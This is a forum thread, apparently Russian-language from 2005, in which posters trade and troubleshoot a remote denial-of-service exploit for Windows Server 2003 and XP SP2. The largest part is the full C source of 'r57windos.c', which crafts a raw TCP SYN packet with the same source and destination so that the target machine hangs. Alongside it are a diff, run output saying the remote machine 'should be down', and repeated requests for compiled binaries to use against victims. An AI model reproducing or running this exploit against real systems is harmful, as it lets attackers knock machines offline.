Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4 5 6 След.
RSS
Windows Server 2003 and XP SP2 remote DoS
 
Damian:
are you root?
 
After some changes,   exploit compiled under FreeBSD 4.10.
But,  under root
-------------
> ./out IP  135
sendto()
: Invalid argument
------------
Thanks in advance.
 
надо написать свой вариант... как напишу скажу
 
guess:
dont blame compiler ;) check the changes first.
 
After code review, changes was:
-------------
--- r57windos.c.orig    Sun Mar  6 20:53:57 2005
+++ r57windos.c Thu Mar 10 10:10:40 2005
@@ -1,14 +1,14 @@
#include <stdio.h>
#include <ctype.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sysexits.h>
+#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
-#include <sysexits.h>
-#include <stdlib.h>
-#include <unistd.h>
-#include <sys/types.h>
------------------

socket is opened
 
check once again if you have permissions.
 
P.S.
Код
localhost:prog {107} ./r57windos 192.168.1.33 5794
setsockopt: Bad file descriptor
localhost:prog {108} su
Password:
localhost# ./r57windos 192.168.1.33 5794
Packet sent. Remote machine should be down.
localhost# uname -a
OpenBSD localhost.localdomain 3.6 KERNELPANIC#0 i386
localhost#
 
чё за гон? ктонидь может дать ссылку на рабочий откомпилированый эксполит
 
Поставил winpcap 3.1 b4 и попробывал запустить NewLand. Прогресс есть. Просит выбрать Device для атаки и начинает генирировать пакеты... генерирует, генерирует, генерирует... Ничего не происходит
Что качается bsd, то там все начительно лучше. У знакомого все заработало и у жертвы комп 100 % грузится. Он пользовался пуьличным первым сплоитом.
 
Нарисовал код под win32,кому нужны исходники,могу поделится,результаты тестов Win2k3:
пробал положит машину со всеми патчам,эксплоит не сработал
кинул 1 пакет на Win2k3 безпатчей,на сек 10 загрузка проца 100%, кинул по одному пакету на 3 открытых порта,загрузка проца 100% на 30 секунд

смысл по моему ясен

код компилил под Visual Studio 2003
 
Мой код не требует дополнительных либ и хидеров,
юзаю SOCK_RAW,компилится без проблем

пишите кому надо
jаvаscriрt:AddSmileyIcon([IMG]http://www.securitylab.ru/forum/smileys/smiley1.gif[/IMG])
 
Цитата
FatalAcid пишет:
Мой код не требует дополнительных либ и хидеров,
юзаю SOCK_RAW,компилится без проблем

пишите кому надо

ужастно срочно нужно скомпиленный, работающий сплойт под Вин... Если есть, плиз намыльте l33roy@mail.ru
 
Да забыл сказать,сплоит работает тока на NT платформах
(т.к. юзаю SOCK_RAW)
лично я пробал пускать под W2k3, на других платформах пускать не пробал,и за неимеючи таковых
 
не суди по себе... Парни, скиньте сорцы и бинарник под вынь 1ora@tut.by
 
мне нужны под win32, мыльте plamiv@tut.by
 
в инет типо не судьба выложить ? поделитесь че там у вас

у меня лично скомпилилось под бздю вот что:
---------
#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <unistd.h>
#include <sysexits.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

/*  
Windows Server 2003 and XP SP2 remote DoS exploit
Tested under OpenBSD 3.6 at WinXP SP 2
Vuln by Dejan Levaja <dejan_@_levaja.com> , http://security.nnov.ru/docs7998.html
©oded by __blf 2005 RusH Security Team , http://rst.void.ru
All rights reserved.
*/

//checksum function by r0ach
u_short checksum (u_short *addr, int len)
{
u_short *w = addr;
int i = len;
int sum = 0;
u_short answer;
while (i > 0)
{
sum += *w++;
i-=2;
}
if (i == 1) sum += *(u_char *)w;
sum = (sum >> 16) + (sum & 0xffff);
sum = sum + (sum >> 16);
return (~sum);
}
int main(int argc, char ** argv)
{
struct in_addr src, dst;
struct sockaddr_in sin;
struct _pseudoheader {
struct in_addr source_addr;
struct in_addr destination_addr;
u_char zero;
u_char protocol;
u_short length;
} pseudoheader;
struct ip * iph;
struct tcphdr * tcph;
int mysock;
u_char * packet;
u_char * pseudopacket;
int on = 1;
if( argc != 3)
{
fprintf(stderr, "r57windos.c by __blf\n");
fprintf(stderr, "RusH Security Team\n");
fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]);
return EX_USAGE;
}
if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL)
{
perror("malloc()\n");
return EX_OSERR;
}
inet_aton(argv[1], &src);
inet_aton(argv[1], &dst);
iph = (struct ip *) packet;
iph->ip_v = IPVERSION;
iph->ip_hl = 5;
iph->ip_tos = 0;
iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
iph->ip_off = htons(IP_DF);
iph->ip_ttl = 255;
iph->ip_p = IPPROTO_TCP;
iph->ip_sum = 0;
iph->ip_src = src;
iph->ip_dst = dst;
tcph = (struct tcphdr *)(packet +sizeof(struct ip));
tcph->th_sport = htons(atoi(argv[2]));
tcph->th_dport = htons(atoi(argv[2]));
tcph->th_seq = ntohl(rand());
tcph->th_ack = rand();
tcph->th_off = 5;
tcph->th_flags = TH_SYN;  // setting up TCP SYN flag here
tcph->th_win = htons(512);
tcph->th_sum = 0;
tcph->th_urp = 0;
pseudoheader.source_addr = src;
pseudoheader.destination_addr = dst;
pseudoheader.zero = 0;
pseudoheader.protocol = IPPROTO_TCP;
pseudoheader.length = htons(sizeof(struct tcphdr));
if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL)
{
perror("malloc()\n");
return EX_OSERR;
}
memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr));
tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr));
mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if(!mysock)
{
perror("socket!\n");
return EX_OSERR;
}
if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror("setsockopt");
shutdown(mysock, 2);
return EX_OSERR;
}
sin.sin_family = PF_INET;
sin.sin_addr = dst;
sin.sin_port = htons(80);
if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1)
{
perror("sendto()\n");
shutdown(mysock, 2);
return EX_OSERR;
}
printf("Packet sent. Remote machine should be down.\n");
shutdown(mysock, 2);
return  EX_OK;
}
 
кстати говорит
[aesgrs@sehsrth poc]$ ./windos 1.1.1.1 445
setsockopt: Bad file descriptor
 
А можно выложить творение Fatalа на паблик!
Кинуть людям ссылку, а то задолбаешся рассылать
 
Скинте и мне на мыло под win32 бинарник plz(NEKdfl@rambler.ru). [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG]
А может кто-нить в инет теперь выложит [IMG]http://www.securitylab.ru/forum/smileys/smiley5.gif[/IMG]
 
Если нет рудно чкиньте кто нить откомпиленную версию. на Tih2004@mail.ru.
Заранее спасибо !
Страницы: Пред. 1 2 3 4 5 6 След.
Читают тему (гостей: 4)